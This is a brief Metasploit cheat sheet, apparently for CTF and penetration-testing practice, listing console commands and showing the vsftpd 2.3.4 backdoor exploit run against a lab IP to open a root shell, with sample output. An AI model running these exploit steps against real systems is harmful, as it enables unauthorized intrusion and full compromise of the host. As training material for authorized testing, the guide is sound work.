Metasploit
Official Documentation: https://www.metasploit.com/¶
Cheat Sheet: Metasploit Commands¶
Purpose¶
Metasploit Framework is a platform for developing, testing, and executing exploits. It provides payloads, encoders, auxiliary modules, and post-exploitation tools.
Scenarios¶
- CTF: Exploit a vulnerable service (like vsftpd, SMB) with a known Metasploit module to get a shell.
- Real world: Simulate attacker behavior with proof-of-concept exploits and post-exploitation modules.
All needed info to run¶
- Start console:
msfconsole. - Search modules:
search <keyword>. - Use module:
use exploit/.... - Show options:
show options. - Set target:
set RHOSTS <ip>,set RPORT <port>. - Set payload:
set PAYLOAD <payload>. - Run:
exploitorrun. - Categories: exploits, auxiliary (scanners), payloads, post, encoders.
- Database integration allows workspace management.
Example commands & outputs¶
# Start console
$ msfconsole
msf6 >
# Search and use vsftpd exploit
msf6 > search vsftpd
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(...) > set RHOSTS 192.168.56.101
msf6 exploit(...) > set PAYLOAD cmd/unix/interact
msf6 exploit(...) > run
# Output:
# [*] Command shell session 1 opened (192.168.56.101:21 -> 192.168.56.1:4444)
# Session interaction
msf6 > sessions -i 1
id
uid=0(root) gid=0(root)
Metasploit Basics
- Use
search <keyword>to find modules for a service or CVE. - Always
show optionsbefore running to configure RHOST, RPORT, payload. - Use
sessions -i <id>to interact with opened shells. - Metasploit is powerful but noisy — avoid using on unauthorized targets.